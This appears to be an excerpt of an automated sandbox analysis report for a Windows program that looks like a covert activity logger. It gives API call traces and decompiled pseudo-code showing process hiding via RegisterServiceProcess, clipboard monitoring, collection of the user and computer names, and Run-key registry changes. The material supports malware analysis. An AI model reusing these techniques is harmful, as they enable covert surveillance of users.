    • #2514.MFC42 ref: 00420E19
    • PostMessageA.USER32 ref: 00420E43
    • #2514.MFC42 ref: 00420E92
    • #641.MFC42 ref: 00420EB0
    • #6199.MFC42(PKL Window), ref: 00420EBC
    • PostMessageA.USER32 ref: 00420EFA
    • SetTimer.USER32(?,00000002,0000012C,00000000), ref: 00420F85
    • SetTimer.USER32(?,00000010,0002BF20,00000000), ref: 00420F92
    • SetTimer.USER32(?,00000012,00003A98,00000000), ref: 00420F9F
    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00000000,?), ref: 00420FDA
    • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00420FE6
    • GetCurrentProcessId.KERNEL32(?), ref: 00420FFD
      • Part of subcall function 0041AFE1: RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Internet Explorer,?), ref: 0041B008
      • Part of subcall function 0041AFE1: RegQueryValueExA.ADVAPI32(?,IEPK,00000000,00000000,?,00000008), ref: 0041B024
      • Part of subcall function 0041AFE1: RegCloseKey.ADVAPI32(?), ref: 0041B042
    • SetTimer.USER32(?,0000000E,0000EA60,00000000), ref: 00421031
    • SetTimer.USER32(?,00000011,0000EA60,00000000), ref: 00421046
    • SetTimer.USER32(?,0000000F,?,00000000), ref: 0042106C
    • SetClipboardViewer.USER32(?), ref: 00421079
    • #800.MFC42(?,?,?,?,?,PKL Window), ref: 004210F0
    • #800.MFC42(?,?,?,?,?,PKL Window), ref: 004210FC
    • #823.MFC42(00000060), ref: 00421147
    • #924.MFC42(?,004558C4,bpkch.dat,00000060), ref: 0042116E
    • #924.MFC42(?,004558C4,web.dat), ref: 0042119F
    • #800.MFC42 ref: 004211C0
    • GetDlgItem.USER32 ref: 004211CD
      • Part of subcall function 00428249: strrchr.MSVCRT ref: 00428265
      • Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00428284
      • Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 00428293
      • Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 0042829E
      • Part of subcall function 00428249: RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 004282AE
      • Part of subcall function 00428249: RegDeleteValueA.ADVAPI32(?,?), ref: 004282B7
      • Part of subcall function 00428249: RegCloseKey.ADVAPI32(?), ref: 004282BC
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Timer$#800$#924CloseValue$#2514CreateDeleteMessageOpenPost$#3811#4710#6199#641#823AddressClipboardCurrentFileH_prologHandleItemModuleProcProcessQueryViewerstrrchr
    • String ID: KERNEL32.DLL$PKL Window$RegisterServiceProcess$bpkch.dat$pk.bin$web.dat
    • API String ID: 1949676480-2796755654
    • Opcode ID: 856523f80d10deadebd798e44b822c3a2f57e943ff31f9122f6e00b473e03b99
    • Instruction ID: db618901531a8d3c67ace127e96e8c737a02fc6d470e0899931d681dfb9774f8
    • Opcode Fuzzy Hash: 856523f80d10deadebd798e44b822c3a2f57e943ff31f9122f6e00b473e03b99
    • Instruction Fuzzy Hash: 36C1E570A04754AADB31EB71DC41AEFBBF4AF19304F40095FF15AA71E2DA785A44CB18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E0041A2B3() {
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t84;
    				intOrPtr _t86;
    				long _t87;
    				void* _t89;
    				void* _t91;
    				void* _t97;
    				int _t99;
    				void* _t145;
    				intOrPtr _t150;
    				long _t151;
    				void* _t152;
    				struct HWND__* _t154;
    				void* _t155;
    
    				E0043E4E0(0x4413c7, _t155);
    				_t150 =  *((intOrPtr*)(_t155 + 8));
    				if(_t150 != 0) {
    					 *(_t155 - 0x24) =  *(_t150 + 0x20);
    				} else {
    					 *(_t155 - 0x24) = 0;
    				}
    				L0043DDD8();
    				 *(_t155 - 4) = 0;
    				L0043DDD8();
    				 *(_t155 - 4) = 1;
    				L0043DDD8();
    				 *(_t155 - 4) = 2;
    				L0043DDD8();
    				_push(_t155 - 0x18);
    				_push(0x42d);
    				 *(_t155 - 4) = 3;
    				L0043E2E2();
    				_push(_t155 - 0x1c);
    				_push(0x42f);
    				L0043E2E2();
    				_push(_t155 - 0x20);
    				_push(0x430);
    				L0043E2E2();
    				_t84 = _t155 + 8;
    				_push(_t84);
    				_push(0x432);
    				L0043E2E2();
    				_push(1);
    				_push(0);
    				_push(0x42e);
    				L0043E2DC();
    				 *((intOrPtr*)(_t155 - 0x10)) = _t84;
    				if( *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x18)) - 8)) != 0) {
    					_t86 =  *((intOrPtr*)(_t155 + 8));
    					if( *((intOrPtr*)(_t86 - 8)) != 0) {
    						_push(0x44a);
    						L0043E066();
    						_t87 = SendMessageA( *(_t86 + 0x20), 0x147, 0, 0);
    						_t151 = _t87;
    						L00412BAB(_t87, 0, _t155 - 0x40, _t145, _t151);
    						_push(0);
    						_push( *((intOrPtr*)(_t155 - 0x10)));
    						 *(_t155 - 4) = 4;
    						_push( *((intOrPtr*)(_t155 - 0x20)));
    						_push( *((intOrPtr*)(_t155 - 0x1c)));
    						_push(_t151);
    						_push( *((intOrPtr*)(_t155 - 0x18)));
    						L00412C8A(_t87, 0, _t155 - 0x40, _t145, _t151);
    						if(_t87 != 0) {
    							L00411E5A(_t87, 0, _t155 - 0x110, _t145, _t151);
    							_push(_t155 + 8);
    							 *(_t155 - 4) = 5;
    							_t89 = E00410E20(_t155 - 0x14);
    							_push(0);
    							_push(_t89);
    							 *(_t155 - 4) = 6;
    							L00412165(_t89, 0, _t155 - 0x110, _t145, _t151);
    							 *(_t155 - 4) = 7;
    							L0043DD36();
    							 *(_t155 - 4) = 5;
    							L0043DD36();
    							_push(_t155 + 8);
    							_t91 = E00410E20(_t155 - 0x14);
    							 *(_t155 - 4) = 8;
    							E00410E56(_t155 - 0x10c, _t91);
    							 *(_t155 - 4) = 9;
    							L0043DD36();
    							 *(_t155 - 4) = 5;
    							L0043DD36();
    							_push(E00429029(_t155 - 0x10, 0xe06a));
    							 *(_t155 - 4) = 0xa;
    							L0043DFCA();
    							 *(_t155 - 4) = 5;
    							L0043DD36();
    							_push(E00429029(_t155 - 0x10, 0xe049));
    							 *(_t155 - 4) = 0xb;
    							L004128F9(_t96, 0, _t155 - 0x110, _t145, _t151);
    							 *(_t155 - 4) = 5;
    							L0043DD36();
    							_t97 = _t155 - 0x110;
    							_push(_t97);
    							L00412FF7(_t97, 0, _t155 - 0x40, _t145, _t151);
    							_push(0xffffffff);
    							if(_t97 != 0) {
    								_push(0x40);
    								_push(0xe04a);
    								L0043E2CA();
    								_t152 = 1;
    							} else {
    								_push(0x10);
    								_push(0xe024);
    								L0043E2CA();
    								_t152 = 0;
    							}
    							_t99 = EnableWindow(GetDlgItem( *(_t155 - 0x24), 0x3e8), 1);
    							 *(_t155 - 4) = 4;
    							L00411F64(_t99, 0, _t155 - 0x110, _t145, _t152);
    						} else {
    							_push(0xffffffff);
    							_push(0x30);
    							_push(0xe023);
    							L0043E2CA();
    							_t99 = EnableWindow(GetDlgItem( *(_t155 - 0x24), 0x3e8), 1);
    							_t152 = 0;
    						}
    						 *(_t155 - 4) = 3;
    						L00412C30(_t99, 0, _t155 - 0x40, _t145, _t152);
    					} else {
    						_push(0xffffffff);
    						_push(0x30);
    						_push(0xe028);
    						L0043E2CA();
    						_push(0);
    						_push(0x432);
    						goto L5;
    					}
    				} else {
    					_push(0xffffffff);
    					_push(0x30);
    					_push(0xe022);
    					L0043E2CA();
    					_push(0);
    					_push(0x42d);
    					L5:
    					PostMessageA( *(_t150 + 0x20), 0x5a3, ??, ??);
    					if(_t150 != 0) {
    						_t154 =  *(_t150 + 0x20);
    					} else {
    						_t154 = 0;
    					}
    					EnableWindow(GetDlgItem(_t154, 0x3e8), 1);
    					_t152 = 0;
    				}
    				 *(_t155 - 4) = 2;
    				L0043DD36();
    				 *(_t155 - 4) = 1;
    				L0043DD36();
    				 *(_t155 - 4) = 0;
    				L0043DD36();
    				 *(_t155 - 4) =  *(_t155 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t155 - 0xc));
    				return _t152;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0041A2B8
    • #540.MFC42 ref: 0041A2DD
    • #540.MFC42 ref: 0041A2E8
    • #540.MFC42 ref: 0041A2F4
    • #540.MFC42 ref: 0041A300
    • #3097.MFC42(0000042D,?), ref: 0041A315
    • #3097.MFC42(0000042F,?,0000042D,?), ref: 0041A325
    • #3097.MFC42(00000430,?,0000042F,?,0000042D,?), ref: 0041A335
    • #3097.MFC42(00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A345
    • #3095.MFC42(0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A354
    • #1199.MFC42(0000E022,00000030,000000FF,0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A36D
    • PostMessageA.USER32 ref: 0041A37C
    • GetDlgItem.USER32 ref: 0041A395
    • EnableWindow.USER32(00000000), ref: 0041A39C
    • #1199.MFC42(0000E028,00000030,000000FF,0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A3BA
      • Part of subcall function 00410E20: __EH_prolog.LIBCMT ref: 00410E25
      • Part of subcall function 00410E20: #540.MFC42 ref: 00410E31
      • Part of subcall function 00410E20: #535.MFC42(?), ref: 00410E40
    • #3092.MFC42(0000044A,0000042E,00000000,00000001,00000432,?,00000430,?,0000042F,?,0000042D,?), ref: 0041A3CE
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0041A3DD
    • #1199.MFC42(0000E023,00000030,000000FF), ref: 0041A414
    • GetDlgItem.USER32 ref: 0041A423
    • EnableWindow.USER32(00000000), ref: 0041A42A
    • #800.MFC42 ref: 0041A46A
    • #800.MFC42 ref: 0041A476
      • Part of subcall function 00410E56: #858.MFC42(?,?,?,00410E0F,?), ref: 00410E5F
      • Part of subcall function 00410E56: #858.MFC42(?,?,?,?,00410E0F,?), ref: 00410E6B
    • #800.MFC42(00000000), ref: 0041A49E
    • #800.MFC42(00000000), ref: 0041A4AA
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #858.MFC42(00000000,00000000), ref: 0041A4CA
    • #800.MFC42(00000000,00000000), ref: 0041A4D6
    • #800.MFC42 ref: 0041A502
    • #1199.MFC42(0000E024,00000010,000000FF), ref: 0041A523
    • #1199.MFC42(0000E04A,00000040,000000FF), ref: 0041A533
    • GetDlgItem.USER32 ref: 0041A545
    • EnableWindow.USER32(00000000), ref: 0041A54C
    • #800.MFC42 ref: 0041A574
    • #800.MFC42 ref: 0041A580
    • #800.MFC42 ref: 0041A58B
    • #800.MFC42 ref: 0041A597
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#1199#540$#3097$#858EnableItemWindow$H_prologMessage$#1168#3092#3095#535#537LoadPostSendString
    • String ID:
    • API String ID: 3760145750-0
    • Opcode ID: 5bb151dad685cbb491c8ef6e692716fd24c267e89cc1aace86dd8dc30ffe76d8
    • Instruction ID: 816b95db5f3ba935112ce0acf2f68253f7a3b3dca8a4a83a310e4f3aef61808b
    • Opcode Fuzzy Hash: 5bb151dad685cbb491c8ef6e692716fd24c267e89cc1aace86dd8dc30ffe76d8
    • Instruction Fuzzy Hash: DE91A3B0D01259EADB11EBE1C946BEEBB78AF18308F10055EF616731C1DBB81B44CA29
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E00424571() {
    				char _t92;
    				char _t98;
    				void* _t104;
    				void* _t105;
    				void* _t106;
    				void* _t107;
    				void* _t108;
    				void* _t109;
    				intOrPtr _t116;
    				int _t123;
    				signed int _t128;
    				signed int _t130;
    				void* _t165;
    
    				E0043E4E0(0x442838, _t165);
    				_push(_t165 - 0x5c);
    				L0043E4A4();
    				 *(_t165 - 0xd4) = 0;
    				GetTimeFormatA(0x400, 2, _t165 - 0x5c, 0, _t165 - 0xd4, 0x32);
    				 *(_t165 - 0xa0) = 0;
    				GetDateFormatA(0x400, 0, _t165 - 0x5c, 0, _t165 - 0xa0, 0x32);
    				_t92 =  *0x4550cc; // 0x0
    				 *(_t165 - 0x1d4) = _t92;
    				_t128 = 0x1f;
    				memset(_t165 - 0x1d3, 0, _t128 << 2);
    				asm("stosw");
    				asm("stosb");
    				 *(_t165 - 0x10) = 0x80;
    				GetUserNameA(_t165 - 0x1d4, _t165 - 0x10);
    				_t98 =  *0x4550cc; // 0x0
    				 *(_t165 - 0x154) = _t98;
    				_t130 = 0x1f;
    				memset(_t165 - 0x153, 0, _t130 << 2);
    				asm("stosw");
    				asm("stosb");
    				 *(_t165 - 0x10) = 0x80;
    				GetComputerNameA(_t165 - 0x154, _t165 - 0x10);
    				_push(0x4532cc);
    				L0043DE26();
    				_t104 = _t165 - 0x154;
    				_push(_t104);
    				 *(_t165 - 4) = 0;
    				L0043DE26();
    				 *(_t165 - 4) = 1;
    				_push(_t165 + 0xc);
    				_push(_t104);
    				_t105 = _t165 - 0x20;
    				_push(_t105);
    				L0043E282();
    				 *(_t165 - 4) = 2;
    				_push(_t165 - 0x1d4);
    				_push(_t105);
    				_t106 = _t165 - 0x1c;
    				_push(_t106);
    				L0043DE20();
    				 *(_t165 - 4) = 3;
    				_push(_t165 + 0xc);
    				_push(_t106);
    				_t107 = _t165 - 0x24;
    				_push(_t107);
    				L0043E282();
    				 *(_t165 - 4) = 4;
    				_push(_t165 - 0xa0);
    				_push(_t107);
    				_t108 = _t165 - 0x2c;
    				_push(_t108);
    				L0043DE20();
    				 *(_t165 - 4) = 5;
    				_push(_t165 + 0xc);
    				_push(_t108);
    				_t109 = _t165 - 0x28;
    				_push(_t109);
    				L0043E282();
    				 *(_t165 - 4) = 6;
    				_push(_t165 - 0xd4);
    				_push(_t109);
    				_push(_t165 - 0x14);
    				L0043DE20();
    				 *(_t165 - 4) = 0xd;
    				L0043DD36();
    				 *(_t165 - 4) = 0xc;
    				L0043DD36();
    				 *(_t165 - 4) = 0xb;
    				L0043DD36();
    				 *(_t165 - 4) = 0xa;
    				L0043DD36();
    				 *(_t165 - 4) = 9;
    				L0043DD36();
    				 *(_t165 - 4) = 8;
    				L0043DD36();
    				SetBkMode( *(_t165 + 8), 1);
    				SetTextColor( *(_t165 + 8), 0xffffff);
    				DrawTextA( *(_t165 + 8),  *(_t165 - 0x14), 0xffffffff, _t165 - 0x4c, 0xc00);
    				_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x10))));
    				 *((intOrPtr*)(_t165 - 0x34)) = _t116;
    				 *(_t165 - 0x3c) = _t116 -  *((intOrPtr*)(_t165 - 0x44)) +  *(_t165 - 0x4c);
    				 *((intOrPtr*)(_t165 - 0x38)) = 0;
    				_push(0);
    				 *((intOrPtr*)(_t165 - 0x30)) =  *((intOrPtr*)(_t165 - 0x40)) -  *((intOrPtr*)(_t165 - 0x48));
    				_push(0);
    				asm("movsd");
    				asm("movsd");
    				asm("movsd");
    				_push(2);
    				_push(2);
    				asm("movsd");
    				L0043E4AA();
    				FillRect( *(_t165 + 8), _t165 - 0x6c, GetStockObject(2));
    				_t123 = DrawTextA( *(_t165 + 8),  *(_t165 - 0x14), 0xffffffff, _t165 - 0x3c, 0x800);
    				 *(_t165 - 4) = 0;
    				L0043DD36();
    				 *(_t165 - 4) =  *(_t165 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0xc));
    				return _t123;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 00424576
    • #6673.MFC42(?), ref: 0042458B
    • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,?,00000032,?), ref: 004245AE
    • GetDateFormatA.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 004245CA
    • GetUserNameA.ADVAPI32(?,?), ref: 004245FE
    • GetComputerNameA.KERNEL32 ref: 0042462D
    • #537.MFC42(004532CC), ref: 0042463B
    • #537.MFC42(?,004532CC), ref: 0042464D
    • #922.MFC42(?,00000000,?,?,004532CC), ref: 0042465F
    • #924.MFC42(?,00000000,?,?,00000000,?,?,004532CC), ref: 00424674
    • #922.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,004532CC), ref: 00424686
    • #924.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,004532CC), ref: 0042469B
    • #922.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246AD
    • #924.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246C2
    • #800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246CE
    • #800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246DA
    • #800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246E6
    • #800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246F2
    • #800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 004246FE
    • #800.MFC42(?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 0042470A
    • SetBkMode.GDI32(?,00000001), ref: 00424714
    • SetTextColor.GDI32(?,00FFFFFF), ref: 00424722
    • DrawTextA.USER32(?,?,000000FF,?,00000C00), ref: 00424739
    • #3920.MFC42(00000002,00000002,00000000,00000000), ref: 00424771
    • GetStockObject.GDI32(00000002), ref: 00424778
    • FillRect.USER32 ref: 00424786
    • DrawTextA.USER32(?,?,000000FF,?,00000800), ref: 0042479D
    • #800.MFC42 ref: 004247A9
    • #800.MFC42 ref: 004247B5
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#922#924Text$#537DrawFormatName$#3920#6673ColorComputerDateFillH_prologModeObjectRectStockTimeUser
    • String ID: 8(D
    • API String ID: 1756050742-4191503897
    • Opcode ID: b7316398b5bbac95001521d3d3ff0a0adf417f377f5c74cbe51a12d56796a24a
    • Instruction ID: 11fff55d11db09615e8b56f13bff350be643aef242557b62dc4dde581cf7e577
    • Opcode Fuzzy Hash: b7316398b5bbac95001521d3d3ff0a0adf417f377f5c74cbe51a12d56796a24a
    • Instruction Fuzzy Hash: 78714771C0024DAEDB05DBA4DC45BEEBBB8AB19304F0081AAF515A7291DB785B09CB64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 55%
    			E0041F000(void* __eax, signed int __ebx, void* __edi, void* __esi) {
    				void* _t19;
    				void* _t24;
    				signed int _t28;
    				void* _t30;
    				int _t66;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t81;
    
    				_t28 = __ebx;
    				_t19 = __eax;
    				_push(0x43b);
    				_t66 = __edi + 0x6c;
    				L0043E066();
    				if(_t66 != 0) {
    					_t66 =  *(_t66 + 4);
    				}
    				SendMessageA( *(_t19 + 0x20), 0x30, _t66, 1);
    				_push(1);
    				_push(0x421);
    				L0043DF82();
    				_push( *0x4554b4);
    				_push(0x463);
    				L0043E066();
    				L0043E15C();
    				_t23 = strcmp( *(E00429029(_t73 - 0x10, 0xe031)), 0x4555bc);
    				L0043DD36();
    				if((_t28 & 0xffffff00 | _t23 == 0x00000000) == 0) {
    					_t30 = 0x465;
    					_push(0x4555bc);
    					_push(0x465);
    					L0043E066();
    					L0043E15C();
    				} else {
    					_push( *((intOrPtr*)(E00429029(_t73 - 0x10, 0xe032))));
    					 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
    					_t30 = 0x465;
    					_push(0x465);
    					L0043E066();
    					L0043E15C();
    					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
    					L0043DD36();
    				}
    				_t81 =  *0x4557c4; // 0x0
    				if(_t81 == 0) {
    					_push(0);
    					_push(0x461);
    					L0043E066();
    					L0043E0AE();
    					_push(0);
    					_t69 = 0x460;
    					_push(0x460);
    					L0043E066();
    					L0043E0AE();
    					_push(0);
    					_push(0x48c);
    					L0043E066();
    					L0043E0AE();
    				} else {
    					_push(1);
    					_t69 = 0x460;
    					_push( *0x4557e0);
    					_push(0x460);
    					L0043E2E8();
    				}
    				if( *0x4557c8 != 0) {
    					_push( *((intOrPtr*)(E00429029(_t73 - 0x14, 0xe051))));
    					 *(_t73 - 4) = 1;
    					_push(0x480);
    					L0043E066();
    					L0043E15C();
    					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
    					L0043DD36();
    					_push(0);
    					_push(0x464);
    					L0043E066();
    					L0043E0AE();
    					_push(0);
    					_push(_t30);
    					L0043E066();
    					L0043E0AE();
    					_push(0);
    					_push(0x461);
    					L0043E066();
    					L0043E0AE();
    					_push(0);
    					_push(_t69);
    					L0043E066();
    					L0043E0AE();
    				}
    				_t24 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
    				return _t24;
    			}


    0x0041f000
    0x0041f000
    0x0041f000
    0x0041f007
    0x0041f00a
    0x0041f011
    0x0041f013
    0x0041f013
    0x0041f01e
    0x0041f024
    0x0041f026
    0x0041f02d
    0x0041f032
    0x0041f03a
    0x0041f03f
    0x0041f046
    0x0041f061
    0x0041f071
    0x0041f078
    0x0041f0b2
    0x0041f0b7
    0x0041f0b8
    0x0041f0bb
    0x0041f0c2
    0x0041f07a
    0x0041f08a
    0x0041f08c
    0x0041f090
    0x0041f097
    0x0041f098
    0x0041f09f
    0x0041f0a4
    0x0041f0ab
    0x0041f0ab
    0x0041f0c9
    0x0041f0cf
    0x0041f0e8
    0x0041f0e9
    0x0041f0f0
    0x0041f0f7
    0x0041f0fc
    0x0041f0fd
    0x0041f102
    0x0041f105
    0x0041f10c
    0x0041f111
    0x0041f113
    0x0041f11a
    0x0041f121
    0x0041f0d1
    0x0041f0d1
    0x0041f0d3
    0x0041f0d8
    0x0041f0e0
    0x0041f0e1
    0x0041f0e1
    0x0041f12d
    0x0041f143
    0x0041f147
    0x0041f14e
    0x0041f153
    0x0041f15a
    0x0041f15f
    0x0041f166
    0x0041f16b
    0x0041f16d
    0x0041f174
    0x0041f17b
    0x0041f180
    0x0041f182
    0x0041f185
    0x0041f18c
    0x0041f191
    0x0041f193
    0x0041f19a
    0x0041f1a1
    0x0041f1a6
    0x0041f1a8
    0x0041f1ab
    0x0041f1b2
    0x0041f1b2
    0x0041f1bc
    0x0041f1c0
    0x0041f1c8

    APIs
    • #3092.MFC42(0000043B), ref: 0041F00A
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 0041F01E
    • #1779.MFC42(00000421,00000001,?,00000001,0000043B), ref: 0041F02D
    • #3092.MFC42(00000463,00000421,00000001,?,00000001,0000043B), ref: 0041F03F
    • #6199.MFC42(00000463,00000421,00000001,?,00000001,0000043B), ref: 0041F046
    • strcmp.MSVCRT ref: 0041F061
    • #800.MFC42 ref: 0041F071
    • #3092.MFC42(00000465,00000000), ref: 0041F098
    • #6199.MFC42(00000465,00000000), ref: 0041F09F
    • #800.MFC42(00000465,00000000), ref: 0041F0AB
    • #3092.MFC42(00000465,004555BC), ref: 0041F0BB
    • #6199.MFC42(00000465,004555BC), ref: 0041F0C2
    • #5951.MFC42(00000460,00000001,00000465,004555BC), ref: 0041F0E1
    • #3092.MFC42(00000461,00000000,00000465,004555BC), ref: 0041F0F0
    • #6215.MFC42(00000461,00000000,00000465,004555BC), ref: 0041F0F7
    • #3092.MFC42(00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F105
    • #6215.MFC42(00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F10C
    • #3092.MFC42(0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F11A
    • #6215.MFC42(0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F121
    • #3092.MFC42(00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F153
    • #6199.MFC42(00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F15A
    • #800.MFC42(00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F166
    • #3092.MFC42(00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F174
    • #6215.MFC42(00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F17B
    • #3092.MFC42(00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F185
    • #6215.MFC42(00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F18C
    • #3092.MFC42(00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F19A
    • #6215.MFC42(00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000,00000465,004555BC), ref: 0041F1A1
    • #3092.MFC42(00000460,00000000,00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000), ref: 0041F1AB
    • #6215.MFC42(00000460,00000000,00000461,00000000,00000465,00000000,00000464,00000000,00000480,00000000,0000048C,00000000,00000460,00000000,00000461,00000000), ref: 0041F1B2
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092$#6215$#6199$#800$#1779#5951MessageSendstrcmp
    • String ID:
    • API String ID: 2233323240-0
    • Opcode ID: fb308fe734c0cd0ed14a13847d3f71ebc130c88744f2bbf0a63345d03efec386
    • Instruction ID: 114ddcffc5063350d49c2625a552faa25558cf5a5025833ae7a9e3111e98a9ec
    • Opcode Fuzzy Hash: fb308fe734c0cd0ed14a13847d3f71ebc130c88744f2bbf0a63345d03efec386
    • Instruction Fuzzy Hash: 0241E331B01328A7EF28B7B3DD16B6D2576DB89B14F00141EB2026B2D2EEFD4A45821D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0040D656(void* __ecx, void* __eflags) {
    				void* __esi;
    				int _t71;
    				void* _t72;
    				void* _t73;
    				struct HINSTANCE__* _t74;
    				struct HINSTANCE__* _t76;
    				intOrPtr* _t81;
    				intOrPtr* _t86;
    				long _t89;
    				void* _t90;
    				intOrPtr* _t91;
    				long _t98;
    				signed int _t118;
    				intOrPtr* _t124;
    				intOrPtr _t131;
    				struct tagRECT* _t133;
    				intOrPtr _t137;
    				signed int _t139;
    				intOrPtr* _t140;
    				void* _t142;
    				void* _t144;
    
    				E0043E4E0(0x440010, _t144);
    				_t142 = __ecx;
    				L0043DF94();
    				SetWindowLongA( *(_t142 + 0x454), 0xfffffff0, GetWindowLongA( *(__ecx + 0x454), 0xfffffff0) | 0x00000002);
    				_t133 = _t142 + 0x48c;
    				GetWindowRect( *(_t142 + 0x2a8), _t133);
    				_push(_t133);
    				L0043E02A();
    				_t71 = InflateRect(_t133, 0xfffffffe, 0xfffffffe);
